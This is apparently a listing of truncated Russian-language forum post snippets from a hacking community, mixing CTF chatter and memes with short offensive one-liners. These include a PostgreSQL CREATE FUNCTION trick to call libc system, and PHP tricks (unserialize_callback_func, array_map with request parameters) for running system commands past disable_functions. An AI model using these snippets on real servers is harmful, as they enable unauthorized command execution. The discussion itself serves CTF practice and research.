Separate names with a comma.
@HAXTA4OK , 20-ка за чтение 0day всех компаний ? бро, я бы тебе больше накинул :)
ахахах нубас, рассмешил :) посмотри еще раз на запрос, истина где-то рядом! ;)
все больше знакомых ников в списке ушедших(( немного общались давным-давно, талантливый ресерчер..грустно..R.I.P. что с ним произошло?
Вот за что нравятся задачки дубля, так это за то что там нет воды: вот тебе готовая, популярная проблема, реши ее. И хорошо подвел к ее решению...
это они еще до болталки не добрались, а там все что душа пожелает: гомосексуализм, оскорбления чувств верующих, порнография от нерд, пропаганда...
с версии 8.2 этот вектор больше не работает CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE C STRICT; ERROR:...
https://www.php.net/manual/ru/function.mysql-query.php function query($str) { switch($this->type) { case...
вроде брал этот момент без подсказок. справедливости ради стоит сказать, что приходилось приходилось применять на практике подобный трюк ни один...
Обход disable_functions в php-cli Имеем штатный набор php.ini disable_functions=exec,passthru,shell_exec,system,proc_open..i.t.d который...
unserialize_callback_func $c='O:2:"id":0:{}'; ini_set('unserialize_callback_func', 'system'); unserialize($c);
Да, конечно, write-up ниже Небывалую упертость в поисках флагов показали Gorbachev, MichelleBoxing, Franky_T, BillyBons отдельное вам спасибо !...
актуальные в php7.3, вызывать будем system("id"); 1. array_map array_map($_GET[x],$_GET); ?x=system&_=id 2. array_walk, array_filter,...
- Эй внучок, пади суда. - Что деда? - А ты знаешь с кем твой дед чалился в 2019 на античате ? - С кем? - С Crlf ! - Ух ты. А кто это? - Ну это тот...
что бы производить :) отличное начало для мема 90% населения уверено, что солнце желтое 99% населения не слышали про античат жизнь боль
Верно, официально целиком весь таск закончил только один человек ;)
